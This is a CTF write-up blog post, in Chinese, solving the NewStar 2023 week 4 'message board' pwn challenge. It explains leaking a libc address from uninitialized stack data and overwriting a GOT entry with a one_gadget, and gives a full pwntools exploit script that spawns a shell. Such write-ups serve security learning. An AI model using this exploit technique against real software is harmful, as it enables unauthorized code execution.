newstar2023 week4 - message board

RocketDev
  2023-10-20 12:00 2023-10-20 12:00 创建   2024-07-30 10:28 2024-07-30 10:28 更新      

文件分析

下载pwn, NX on, PIE off, Canary off, RELRO partial
ghidra分析为64位程序

解题思路

一开始就要拿到puts的地址?how to?
scanf也只能修改任意地址一次,又要怎么做?

分别利用栈初始化和one_gadget即可

tips

  1. libcBase并不是无中生有,而是在栈上存在未初始化的_IO_2_1_stderr_
  2. 数字会覆盖到栈上;垃圾字符会导致scanf一直输入不了;而'+'能使scanf跳过输入, 不覆盖栈内容
  3. ELF里的symbols不止可以找函数,找stderr这样的标签都是可以的
  4. got可写,那么可以利用one_gadget来使一个函数直接运行打开shell(但是要注意限制条件)
  5. 注意got里的函数是不可写的,只有.got.plt里的函数可写
  6. one_gadget在本地不一定是可用的,在我的电脑上就没开起来(但是验证了可行性)

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *

def payload(lo):
    global sh
    if lo:
        sh = process('msgboard')
        gdb.attach(sh)
    else:
        sh = remote('node4.buuoj.cn', 27179)

    # payload 1, leak _IO_2_1_stderr_
    sh.sendline(b'2 + +') # 
    sh.recvuntil(b'is ') # skip
    sh.recvuntil(b'is ') # skip
    stderr = int(sh.recvline())

    if lo:
        libc = ELF('/usr/lib/libc.so.6')
    else:
        libc = ELF('libc-2.31.so')
    libcBase = stderr - libc.symbols['_IO_2_1_stderr_']
    print(hex(libcBase)) # check it
    putsGotAddr = libcBase + libc.symbols['puts'] # shift

    if lo:
        oneGadget = libcBase + 0xfabcf # r9 == 0 && rdx == 0 && [rsp + 0x70] == 0
    else:
        oneGadget = libcBase + 0xe3b01 # r15 == 0 && rdx == 0

    # payload 2, send puts addr shifted from stderr
    sh.sendline(str(putsGotAddr).encode())

    elf = ELF('msgboard')
    symA = elf.bss(0xa0 - 0x60)
    printfGot = elf.got['__isoc99_scanf']
    offset = (printfGot - symA) // 4 # locate printfGot
    print(offset)

    # payload 3, modify printf to one_gadget
    sh.sendlineafter(b'ons', str(offset).encode()) # idx
    sh.sendlineafter(b'ion', str(oneGadget & 0xffffffff).encode()) # content, 32b
    # now running printf opens shell

    sh.interactive()

Done.

  • 标题: newstar2023 week4 - message board
  • 作者: RocketDev
  • 创建于 : 2023-10-20 12:00:00
  • 更新于 : 2024-07-30 10:28:00
  • 链接: https://rocketmadev.github.io/2023/10/20/W4_message_board/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
newstar2023 week4 - message board
  1. 文件分析
  2. 解题思路
  3. EXPLOIT